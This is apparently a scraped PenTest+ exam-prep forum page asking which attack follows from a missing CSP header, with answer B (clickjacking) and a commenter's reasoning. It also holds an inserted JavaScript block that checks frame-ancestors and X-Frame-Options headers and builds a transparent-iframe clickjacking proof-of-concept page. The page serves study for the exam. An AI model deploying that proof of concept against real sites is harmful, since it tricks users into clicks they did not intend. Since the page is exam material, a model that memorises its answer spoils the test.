A penetration tester observes that the Content Security Policy (CSP) header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
PenTest+ Practice Tests Book
B. - Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the top-level page. The tester is "hijacking" clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user's knowledge, such as clicking a button that appears to perform another function.
This one was tough. Everything I read online said that CSP (Content Security Policy) helped to prevent XSS. However, I finally found a source that stated it protects against XSS and ClickJacking. Since XSS is not an option here ClickJacking is the best answer.
Source: https://content-security-policy.com/
the reference on the answer also mentioned clickjacking is prevented by CSP
upvoted 2 times
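The check a tester actually runs after noticing the missing header, as an added example that is not from the page or from any of the sources the commenter cites: given a captured set of response headers, decide whether the page can be framed from an attacker-controlled origin (CSP `frame-ancestors` governs when present and takes precedence over `X-Frame-Options`; otherwise `X-Frame-Options` is consulted), and build the transparent-iframe overlay used to confirm clickjacking in a browser. The header sets and the origins `https://target.example`, `https://evil.example` and `https://partner.example` are constructed for the example.

```javascript
// Added example (not from the original page). Evaluates whether a response
// can be framed by an attacker origin and builds a clickjacking PoC page.

// Parse a CSP header value into { directiveName: [sourceTokens...] }.
// Per the CSP spec only the first occurrence of a directive is honoured.
function parseCsp(value) {
  const directives = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// Does one frame-ancestors source expression let `origin` embed a page served
// from `self`? Handles 'none', 'self', '*', scheme-only sources such as
// "https:" and exact origins. Wildcard hosts (*.example) are out of scope.
function sourceAllows(source, origin, self) {
  const s = source.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === '*') return true;
  if (s === 'self') return origin === self;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return origin.startsWith(s + '//');
  return origin === s;
}

// headers: lowercase header name -> value, as captured from the response.
// attackerOrigin: origin that would host the clickjacking page.
// self: origin that served the response.
function assessFraming(headers, attackerOrigin, self) {
  const attacker = attackerOrigin.toLowerCase();
  const me = self.toLowerCase();
  const csp = headers['content-security-policy'];
  if (csp) {
    const fa = parseCsp(csp)['frame-ancestors'];
    if (fa !== undefined) {
      // frame-ancestors is present, so it governs and X-Frame-Options is
      // ignored. An empty source list is treated as 'none' here.
      const sources = fa.length === 0 ? ["'none'"] : fa;
      const allowed = sources.some((src) => sourceAllows(src, attacker, me));
      return { frameable: allowed, control: 'csp-frame-ancestors' };
    }
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return { frameable: false, control: 'x-frame-options' };
  if (xfo === 'SAMEORIGIN') {
    return { frameable: attacker === me, control: 'x-frame-options' };
  }
  // No CSP frame-ancestors and no usable X-Frame-Options (ALLOW-FROM is
  // obsolete and ignored by current browsers): the page is frameable.
  return { frameable: true, control: 'none' };
}

function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
}

// Classic clickjacking proof of concept: the target page in a fully
// transparent iframe stacked above a decoy button, so a click on the decoy
// lands on whatever sits at that spot in the framed page.
function buildClickjackPoc(targetUrl, decoyLabel) {
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;top:120px;left:80px;z-index:1">${escapeAttr(decoyLabel)}</button>`,
    `<iframe src="${escapeAttr(targetUrl)}" style="position:absolute;top:0;left:0;width:800px;height:600px;opacity:0;z-index:2;border:0"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Constructed header sets that a tester might capture from different targets.
const SAMPLES = {
  noHeaders: { 'content-type': 'text/html' },
  cspNone: { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  cspSelfAndPartner: { 'content-security-policy': "frame-ancestors 'self' https://partner.example" },
  cspSchemeOnly: { 'content-security-policy': 'frame-ancestors https:' },
  xfoDeny: { 'x-frame-options': 'DENY' },
  cspNoFrameAncestors: { 'content-security-policy': "default-src 'self'", 'x-frame-options': 'SAMEORIGIN' },
};

// Usage: run every sample against a hypothetical attacker origin.
for (const [name, headers] of Object.entries(SAMPLES)) {
  console.log(name, assessFraming(headers, 'https://evil.example', 'https://target.example'));
}
```

Only the `noHeaders` and `cspSchemeOnly` captures are frameable from `https://evil.example`; the PoC returned by `buildClickjackPoc` is the page a tester would serve from that origin to demonstrate the finding, with the decoy label and target URL adjusted to the real application.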
PT0-001 Exam Questions
Community vote distribution: A (35%), C (25%), B (20%), Other
mr_robot (Highly Voted, 5 years, 3 months ago)
miabe (Most Recent, 3 years ago)
someguy1393 (4 years, 7 months ago)
tester27 (4 years ago)